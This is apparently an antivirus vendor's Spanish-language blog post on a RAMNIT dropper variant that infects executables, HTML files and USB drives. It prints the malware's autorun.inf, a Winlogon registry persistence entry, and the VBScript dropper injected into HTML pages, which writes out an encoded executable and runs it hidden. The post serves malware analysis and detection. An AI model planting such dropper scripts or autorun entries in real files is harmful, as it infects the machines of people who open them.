NUEVA VARIANTE DE DROPPER INFECTOR DE VIRUS RAMNIT QUE TAMBIEN INFECTA PENDRIVES

Una nueva variante del ya conocido RAMNIT, aunque el último conocido no infectaba pendrives, es este,que sí que infecta pendrives, e infecta por acción directa, ficheros tipo EXE, Dlls y HTML

Caracteristicas principales:

– Queda residente
– Es infector de EXEs,DLLs y HTMLs (de acción directa)
– Modifica la cabecera y se añade al final del fichero anfitrión.
– Al Ejecutar un EXE infectado, genera y ejecuta en la misma ubicación con
nombre “%NombreAnfitrion%mgr.exe” o
“%NombreAnfitrion%Svr.exe” (según variante)

%Archivos de Programa%\ Microsoft\ Desktoplayer.exe

y en %WinTmp%\ SVCHOST.EXE ——> (generado por los HTMLs viricos)

Y en los pendrives:

X:\ Autorun.inf
X:\ RECYCLER\ S-8-4-62-0026722510-1140253607-615058321-5804\ sWlNRshI.exe
(varia en cada infección)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“Userinit”=”%WinSys%\ userinit.exe,,%Archivos de Programa%\ Microsoft\ Desktoplayer.exe”

Contenido del Autorun.inf (con muchos caracteres antes y después del código):

[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=.\RECYCLER\S-8-4-62-0026722510-1140253607-615058321-5804\sWlNRshI.exe
shell\explore\command=.\RECYCLER\S-8-4-62-0026722510-1140253607-615058321-5804\sWlNRshI.exe
USEAUTOPLAY=1
shell\Open\command=.\RECYCLER\S-8-4-62-0026722510-1140253607-615058321-5804\sWlNRshI.exe

Infeccion EXEs y DLLs:

– Modifica la Cabecera del PE y se añade al final del fichero anfitrion :

57.344 bytes (sin polimorfismo)

En la infeccion en HTMLs, añade al final:

<SCRIPT Language=VBScript><!–
DropFileName = “svchost.exe”
WriteData = “4D5A5000020000000400….” (código del Virus)
Set FSO = CreateObject(“Scripting.FileSystemObject”)
DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shell”)
WSHshell.Run DropPath, 0
//–></SCRIPT>

A partir del ELISTARA 39.34 detectamos este nuevo engendro, tanto en registro como de pendrives, pero los ficheros infectados, que habrá un montón, será cuestión de limpiarlos con un antivirus que lo detecte, ya que para no eliminarlos y perderlos, no tomamos medidas contra ellos (Pero estarán infectados y es preciso limpiarlos)

Preanalisis de virustotal de un fichero dropper con este RAMNIT

 

saludos

ms, 26-6-2018

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies